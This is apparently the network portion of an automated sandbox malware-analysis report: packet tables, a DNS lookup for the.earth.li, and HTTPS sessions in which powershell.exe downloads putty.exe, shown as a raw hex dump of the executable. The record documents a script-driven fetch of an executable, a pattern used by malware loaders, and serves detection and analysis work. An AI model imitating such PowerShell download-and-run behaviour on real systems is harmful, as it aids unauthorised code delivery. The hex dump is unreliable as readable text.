                                                        Jan 3, 2025 12:17:58.305696964 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.305757046 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.305927038 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.305974960 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.305986881 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.305990934 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.306020021 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.306037903 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.338795900 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.338850975 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.338885069 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.338891983 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.338926077 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.338938951 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.352252960 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.352314949 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.352422953 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.352484941 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.390732050 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.390803099 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.390991926 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.391001940 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.391067982 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.391165018 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.391252041 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.391374111 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.391379118 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.391421080 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.391479015 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.391484022 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.391596079 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.391653061 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.391658068 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.391731977 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.391794920 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.391799927 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.392045021 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.392101049 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.392106056 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.392205000 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.392250061 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.392257929 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.392262936 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.392297983 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.392318010 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.392441988 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.392499924 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.424379110 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.424451113 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.424545050 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.424607038 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.438759089 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.438826084 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.438910961 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.438977003 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.477066994 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.477123022 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.477169037 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.477174997 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.477185965 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.477220058 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.477268934 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.477338076 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.477466106 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.477521896 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.477567911 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.477628946 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.477752924 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.477809906 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.477885008 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.477947950 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.478039026 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.478094101 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.478286982 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.478351116 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.478425026 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.478480101 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.478569031 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.478630066 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.478744984 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.478800058 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.510663033 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.510719061 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.510746002 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.510751009 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.510902882 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.510902882 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.525053024 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.525139093 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.525233030 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.525466919 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.563483000 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.563575983 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.563602924 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.563709974 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.563709974 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.563715935 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.563771963 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.563832998 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.563837051 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.564094067 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.564135075 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.564158916 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.564162970 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.564178944 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.564198017 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.564213037 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.564269066 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.564426899 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.564486980 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.564573050 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.564629078 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.564831972 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.564893961 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.564943075 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.564999104 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.565052032 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.565105915 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.597038984 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.597098112 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.597111940 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.597115993 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.597142935 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.597162008 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.611323118 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.611388922 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.611457109 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.611510992 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.657893896 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.658047915 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.658066034 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.658107042 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.658124924 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.658128977 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.658153057 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.658159018 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.658170938 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.658174992 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.658209085 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.658216000 CET4434973193.93.131.124192.168.2.4
                                                        Jan 3, 2025 12:17:58.658253908 CET49731443192.168.2.493.93.131.124
                                                        Jan 3, 2025 12:17:58.658632040 CET49731443192.168.2.493.93.131.124

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 3, 2025 12:17:55.461955070 CET6544353192.168.2.41.1.1.1
                                                        Jan 3, 2025 12:17:55.585979939 CET53654431.1.1.1192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 3, 2025 12:17:55.461955070 CET192.168.2.41.1.1.10x1eeeStandard query (0)the.earth.liA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 3, 2025 12:17:55.585979939 CET1.1.1.1192.168.2.40x1eeeNo error (0)the.earth.li93.93.131.124A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • the.earth.li

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.44973093.93.131.1244437496C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-03 11:17:56 UTC98OUTGET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1
                                                        Host: the.earth.li
                                                        Connection: Keep-Alive
                                                        2025-01-03 11:17:56 UTC227INHTTP/1.1 302 Found
                                                        Date: Fri, 03 Jan 2025 11:17:56 GMT
                                                        Server: Apache
                                                        Location: https://the.earth.li/~sgtatham/putty/0.82/w64/putty.exe
                                                        Content-Length: 302
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        2025-01-03 11:17:56 UTC302INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 30 2e 38 32 2f 77 36 34 2f 70 75 74 74 79 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.82/w64/putty.exe">here</a>.</p><hr><address>Apache Server at


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.44973193.93.131.1244437496C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-03 11:17:57 UTC72OUTGET /~sgtatham/putty/0.82/w64/putty.exe HTTP/1.1
                                                        Host: the.earth.li
                                                        2025-01-03 11:17:57 UTC257INHTTP/1.1 200 OK
                                                        Date: Fri, 03 Jan 2025 11:17:57 GMT
                                                        Server: Apache
                                                        Last-Modified: Mon, 25 Nov 2024 20:03:19 GMT
                                                        ETag: "19b068-627c239596244"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1683560
                                                        Connection: close
                                                        Content-Type: application/x-msdos-program
                                                        2025-01-03 11:17:57 UTC7935INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 d3 d6 44 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 70 0e 00 00 d6 0a 00 00 00 00 00 44 97 0b 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 19 00 00 04 00 00 1c be 19 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00
                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdDg"pD@`
                                                        2025-01-03 11:17:57 UTC8000INData Raw: 5d 38 41 2b 45 48 99 f7 fd 89 c5 89 c8 29 d8 83 c0 01 85 c9 0f 49 c1 41 2b 45 44 99 f7 fb 49 8b 8d d8 0b 00 00 80 7c 24 54 00 44 88 44 24 40 44 88 7c 24 38 0f 95 44 24 30 89 6c 24 28 89 44 24 20 44 89 e2 45 31 c0 41 b9 01 00 00 00 e8 ef 0f 01 00 48 8b 5c 24 70 8b 6c 24 78 41 8b 85 d4 12 00 00 89 c1 f7 d9 0f 48 c8 83 f9 77 0f 86 c0 0b 00 00 b9 88 ff ff ff 45 89 f4 85 c0 7f 0e b9 78 00 00 00 41 89 ec 0f 89 a6 0b 00 00 01 c8 41 89 85 d4 12 00 00 41 80 bd d0 12 00 00 00 74 1c 49 8b 8d c8 0b 00 00 ba a3 00 00 00 e8 91 a5 03 00 84 c0 74 40 80 7c 24 54 00 74 39 81 ff 0e 02 00 00 74 98 49 8b 8d d8 0b 00 00 8b 81 74 01 00 00 89 c2 f7 da 41 83 fc 07 0f 45 d0 41 89 d0 41 c1 e8 1f 41 01 d0 41 d1 f8 31 d2 e8 12 fe 00 00 e9 67 ff ff ff 8b 44 24 68 89 84 24 b0 00 00 00
                                                        Data Ascii: ]8A+EH)IA+EDI|$TDD$@D|$8D$0l$(D$ DE1AH\$pl$xAHwExAAAtIt@|$Tt9tItAEAAAA1gD$h$
                                                        2025-01-03 11:17:57 UTC8000INData Raw: 05 c6 44 24 53 39 b2 01 80 7c 24 58 00 74 2a 44 20 ca 80 fa 01 0f 85 92 00 00 00 0f b6 44 24 53 41 8b 8d f0 12 00 00 8d 0c 89 8d 04 48 83 c0 d0 41 89 85 f0 12 00 00 eb 7f 8b 44 24 54 d1 e8 49 8b 95 d8 0b 00 00 88 44 24 20 41 80 e4 01 48 89 e9 44 8a 44 24 53 45 89 e1 e8 33 4e 01 00 48 63 c8 48 8d 04 29 85 c9 48 0f 45 e8 b9 01 00 00 00 41 0f 44 ce 83 f9 07 74 47 83 f9 09 75 52 80 7c 24 5f 00 74 5c 49 8b 85 d8 0b 00 00 80 b8 8d 01 00 00 00 74 4c 66 c7 45 00 0d 0a 48 8d 84 24 b0 00 00 00 29 c5 83 c5 02 e9 60 fb ff ff 41 c7 85 f0 12 00 00 00 00 00 00 b0 01 89 44 24 58 eb 08 c7 44 24 58 00 00 00 00 49 89 db e9 33 ee ff ff 48 8d 8c 24 b0 00 00 00 29 c8 89 c6 e9 2f fb ff ff c6 45 00 0d e9 3c fc ff ff c6 44 24 53 2b 31 d2 e9 12 ff ff ff c6 44 24 53 2f 31 d2 e9 06
                                                        Data Ascii: D$S9|$Xt*D D$SAHAD$TID$ AHDD$SE3NHcH)HEADtGuR|$_t\ItLfEH$)`AD$XD$XI3H$)/E<D$S+1D$S/1
                                                        2025-01-03 11:17:57 UTC8000INData Raw: 0d fc 11 00 48 85 c0 74 37 48 8d 94 24 78 01 00 00 48 89 e9 ff 15 bf fb 11 00 85 c0 74 22 4c 8d 84 24 78 01 00 00 48 89 f1 48 89 ea e8 10 5e 00 00 44 8b b4 24 78 01 00 00 41 c1 e6 08 41 01 c6 48 8b 96 f8 0b 00 00 bf fe ff ff ff 48 85 d2 74 42 48 89 e9 ff 15 b7 fb 11 00 48 85 c0 74 34 48 8d 94 24 78 01 00 00 48 89 e9 ff 15 69 fb 11 00 85 c0 74 1f 4c 8d 84 24 78 01 00 00 48 89 f1 48 89 ea e8 ba 5d 00 00 8b bc 24 78 01 00 00 c1 e7 08 01 c7 48 8b 4e 28 48 89 ea ff 15 f9 fe 11 00 48 8b 0d f2 55 12 00 48 83 f9 ff 74 06 ff 15 a6 fc 11 00 44 8b 4e 38 8b 46 3c 45 01 c9 48 8b 0d b5 64 12 00 89 44 24 20 c7 44 24 28 00 00 00 00 ba c8 00 00 00 41 b8 01 00 00 00 ff 15 28 fe 11 00 48 89 05 b1 55 12 00 39 df 74 22 c7 86 6c 0e 00 00 00 00 00 00 48 8b 8e f8 0b 00 00 ff 15
                                                        Data Ascii: Ht7H$xHt"L$xHH^D$xAAHHtBHHt4H$xHitL$xHH]$xHN(HHUHtDN8F<EHdD$ D$(A(HU9t"lH
                                                        2025-01-03 11:17:57 UTC8000INData Raw: 86 1c 13 00 00 48 8b 87 c0 0b 00 00 80 b8 80 01 00 00 00 74 0a 48 83 c4 38 5b 5f 5e 41 5e c3 48 89 f1 ba 02 00 00 00 48 83 c4 38 5b 5f 5e 41 5e e9 3c 33 00 00 cc cc cc cc cc cc cc cc cc cc cc cc 41 57 41 56 41 55 41 54 56 57 55 53 48 81 ec 88 07 00 00 0f 29 b4 24 70 07 00 00 44 8a b4 24 00 08 00 00 8b 9c 24 f8 07 00 00 48 8b ac 24 f0 07 00 00 48 8b 05 07 37 12 00 48 31 e0 48 89 84 24 68 07 00 00 83 fa 02 0f 85 fe 0c 00 00 4d 89 cf 4c 89 c7 48 89 4c 24 50 48 89 6c 24 78 0f 57 c0 0f 11 44 24 30 c7 44 24 28 00 00 00 00 48 c7 44 24 20 00 00 00 00 31 c9 31 d2 41 89 d9 ff 15 fd e4 11 00 41 89 c4 48 63 eb 48 01 ed 48 8b 35 e5 e2 11 00 b9 02 20 00 00 48 89 ea ff d6 49 89 c5 44 89 64 24 48 49 63 d4 b9 02 20 00 00 ff d6 48 89 c6 4d 85 ed 0f 84 3c 01 00 00 48 85 f6
                                                        Data Ascii: HtH8[_^A^HH8[_^A^<3AWAVAUATVWUSH)$pD$$H$H7H1H$hMLHL$PHl$xWD$0D$(HD$ 11AAHcHH5 HIDd$HIc HM<H
                                                        2025-01-03 11:17:57 UTC8000INData Raw: 15 8c bd 11 00 49 8b 8f 08 13 00 00 89 b4 24 e4 00 00 00 89 f2 ff 15 b6 bd 11 00 49 8b 8f 08 13 00 00 89 da ff 15 77 bd 11 00 49 8b 8f 08 13 00 00 44 89 e2 c1 fa 1f 83 c2 02 ff 15 69 bd 11 00 48 8b 84 24 88 00 00 00 89 84 24 20 01 00 00 44 89 b4 24 24 01 00 00 41 8b 47 3c 44 01 f0 89 84 24 2c 01 00 00 8b b4 24 10 02 00 00 85 f6 0f 8e b6 00 00 00 31 c9 31 c0 31 d2 44 8b 44 24 6c eb 0f 89 d5 83 c5 01 89 ea 39 f5 0f 8d a1 00 00 00 8d 6a 01 48 63 da 41 0f b7 5c 5d 00 39 f5 7d 61 0f b7 fb 81 ff 40 db 00 00 75 26 48 63 fd 41 0f b7 7c 7d 00 81 c7 00 23 00 00 0f b7 ff 81 ff f0 00 00 00 72 be eb 1a 66 2e 0f 1f 84 00 00 00 00 00 89 df 81 e7 00 fc 00 00 81 ff 00 d8 00 00 75 20 48 63 fd 41 0f b7 7c 7d 00 81 e7 00 fc 00 00 81 ff 00 dc 00 00 75 09 44 01 c0 eb 86 0f 1f
                                                        Data Ascii: I$IwIDiH$$ D$$AG<D$,$111DD$l9jHcA\]9}a@u&HcA|}#rf.u HcA|}uD
                                                        2025-01-03 11:17:57 UTC8000INData Raw: 4c 24 38 48 31 e1 e8 e6 ca 0a 00 90 48 83 c4 40 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 48 83 ec 28 48 89 ce 80 3d 98 07 12 00 01 75 10 48 89 f1 48 83 c4 28 5f 5e 48 ff 25 3e a2 11 00 4c 8d 05 53 5d 10 00 31 c9 e8 30 24 03 00 48 89 c7 48 89 f1 48 89 c2 ff 15 19 a2 11 00 48 89 f9 48 83 c4 28 5f 5e e9 73 2f 03 00 cc cc cc 48 8d 05 a9 07 12 00 c3 cc cc cc cc cc cc cc cc 56 48 81 ec e0 00 00 00 66 44 0f 29 8c 24 d0 00 00 00 66 44 0f 29 84 24 c0 00 00 00 0f 29 bc 24 b0 00 00 00 0f 29 b4 24 a0 00 00 00 4c 89 c6 48 8b 05 4a f8 11 00 48 31 e0 48 89 84 24 98 00 00 00 41 f6 40 33 01 75 08 8b 76 14 e9 3d 02 00 00 66 c7 41 40 01 01 4c 8d 4c 24 20 48 89 d1 ba 30 00 00 00 41 b8 39 00 00 00 ff 15 b1 9c 11 00 85 c0 0f 84 13 02 00 00 f3 0f 10 44 24 20 f3
                                                        Data Ascii: L$8H1H@^VWH(H=uHH(_^H%>LS]10$HHHHH(_^s/HVHfD)$fD)$)$)$LHJH1H$A@3uv=fA@LL$ H0A9D$
                                                        2025-01-03 11:17:57 UTC8000INData Raw: c1 44 0f b6 ca be 00 00 00 00 44 0f 48 ce 48 8b 74 24 50 3b 04 2e 75 39 44 89 da 81 e2 ff ff ff 0f 48 8d 2c 89 44 89 c8 24 01 3b 54 ae 04 0f 84 d1 00 00 00 84 c0 48 8b 74 24 60 74 23 e9 b6 00 00 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 41 f6 c1 01 48 8b 74 24 60 0f 85 91 00 00 00 49 63 c0 41 b1 01 48 39 c1 0f 8e 3b ff ff ff 89 cd 29 c5 48 8d 50 01 40 f6 c5 01 74 1b 48 8d 04 80 81 4c 83 04 ff ff 03 00 48 8b 47 28 48 8b 04 f0 48 8b 58 18 48 89 d0 48 39 d1 0f 84 00 ff ff ff 48 8d 14 85 00 00 00 00 48 8d 14 92 0f 1f 40 00 81 4c 13 04 ff ff 03 00 48 8b 6f 28 48 8b 6c f5 00 48 8b 6d 18 81 4c 15 18 ff ff 03 00 48 83 c0 02 48 8b 6f 28 48 8b 6c f5 00 48 8b 5d 18 48 83 c2 28 48 39 c1 75 c9 e9 b4 fe ff ff 0f 1f 40 00 89 d0 24 01 41 89 d1 84 c0 0f 85 aa fe ff
                                                        Data Ascii: DDHHt$P;.u9DH,D$;THt$`t#f.DAHt$`IcAH9;)HP@tHLHG(HHXHH9HH@LHo(HlHmLHHo(HlH]H(H9u@$A
                                                        2025-01-03 11:17:57 UTC8000INData Raw: 85 fb 00 00 00 01 41 c6 85 01 11 00 00 00 41 80 bd 7a 11 00 00 00 74 2c 41 80 bd 80 01 00 00 00 74 22 ff 15 69 61 11 00 48 8d 15 12 aa 00 00 89 c1 4d 89 e8 e8 58 bb 01 00 41 89 85 08 11 00 00 b0 01 eb 02 31 c0 41 88 85 01 11 00 00 41 80 bd f9 10 00 00 00 74 11 48 83 c4 28 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 41 c6 85 f9 10 00 00 01 48 8d 0d 7a a9 00 00 4c 89 ea 48 83 c4 28 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f e9 32 b9 01 00 cc cc 41 57 41 56 56 57 53 48 83 ec 40 48 89 ce 48 8b 05 db b9 11 00 48 31 e0 48 89 44 24 38 80 b9 18 01 00 00 00 75 0d 80 be 19 01 00 00 00 0f 84 c7 00 00 00 48 89 f1 e8 75 c3 00 00 48 8d be 20 01 00 00 48 89 f9 e8 16 3b 02 00 48 85 c0 0f 84 87 00 00 00 48 89 c3 48 8d 4c 24 20 48 89 fa e8 2d 66 03 00 48 8b 44 24 20 8a 00 88 44 24 37
                                                        Data Ascii: AAzt,At"iaHMXA1AAtH([]_^A\A]A^A_AHzLH([]_^A\A]A^A_2AWAVVWSH@HHH1HD$8uHuH H;HHHL$ H-fHD$ D$7
